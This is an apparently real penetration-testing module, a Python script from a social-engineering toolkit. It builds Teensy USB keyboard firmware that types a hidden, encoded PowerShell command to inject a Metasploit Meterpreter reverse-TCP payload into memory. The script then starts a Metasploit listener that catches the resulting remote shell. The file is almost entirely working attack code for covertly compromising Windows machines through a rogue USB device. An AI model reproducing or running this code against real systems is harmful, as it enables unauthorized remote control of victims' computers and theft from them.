#!/usr/bin/python import pexpect from src.core.setcore import yesno_prompt print """ The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk. This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html) """ payload = raw_input("Select payload you want to delivery via the powershell - shellcode injection\n\n1. Metasploit Meterpreter (x86)\n2. Metasploit Meterpreter (x64)\n\nEnter your choice: ") if payload == "": payload = "2" if payload == "1": path = "src/program_junk/x86.powershell" payload = "windows/meterpreter/reverse_tcp" if payload == "2": path = "src/program_junk/x64.powershell" payload = "windows/x64/meterpreter/reverse_tcp" # create base metasploit payload to pass to powershell.prep filewrite = file("src/program_junk/metasploit.payload", "w") filewrite.write(payload) filewrite.close() import src.payloads.powershell.prep fileopen = file(path, "r") #payload_encoded = fileopen.read() # read in x amount of bytes data_read = int(50) output_variable = "#include \n" counter = 0 while 1: reading_encoded = fileopen.read(data_read).rstrip() if reading_encoded == "": break output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_encoded) counter = counter + 1 rev_counter = 0 output_variable += "PROGMEM const char *exploit[] = {\n" while rev_counter != counter: output_variable+="RevShell_%s" % rev_counter rev_counter = rev_counter +1 if rev_counter == counter: output_variable+="};\n" if rev_counter != counter: output_variable+=",\n" teensy = output_variable # write the rest of the teensy code teensy+=(""" char buffer[55]; int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); } void loop() { BlinkFast(2); delay(5000); CommandAtRunBar("cmd"); delay(750); Keyboard.print("powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand "); // Write the binary to the notepad file int i; for (i = 0; i < sizeof(exploit)/sizeof(int); i++) { strcpy_P(buffer, (char*)pgm_read_word(&(exploit[i]))); Keyboard.print(buffer); delay(30); } // ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST! Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); //delay(20000); //Keyboard.println("exit"); delay(9000000); } void BlinkFast(int BlinkRate){ int BlinkCounter=0; for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){ digitalWrite(ledPin, HIGH); delay(80); digitalWrite(ledPin, LOW); delay(80); } } void AltF4(){ Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_F4); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } void CtrlS(){ Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.set_key1(KEY_S); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } // Taken from IronGeek void CommandAtRunBar(char *SomeCommand){ Keyboard.set_modifier(128); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(1500); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void PRES(int KeyCode){ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void SPRE(int KeyCode){ Keyboard.set_modifier(MODIFIERKEY_SHIFT); Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } """) print "[*] Payload has been extracted. Copying file to reports/teensy.pde" filewrite = file("reports/teensy.pde", "w") filewrite.write(teensy) filewrite.close() choice = yesno_prompt("0","Do you want to start a listener [yes/no]: ") if choice == "YES": fileopen = file("src/program_junk/ipaddr.file", "r") ipaddr = fileopen.read() fileopen = file("src/program_junk/port.options", "r") port = fileopen.read() filewrite = file("src/program_junk/metasploit.answers", "w") filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript migrate -f\nexploit -j" % (payload,ipaddr,port)) filewrite.close() print "[*] Launching Metasploit...." try: child = pexpect.spawn("msfconsole -r src/program_junk/metasploit.answers") child.interact() except: pass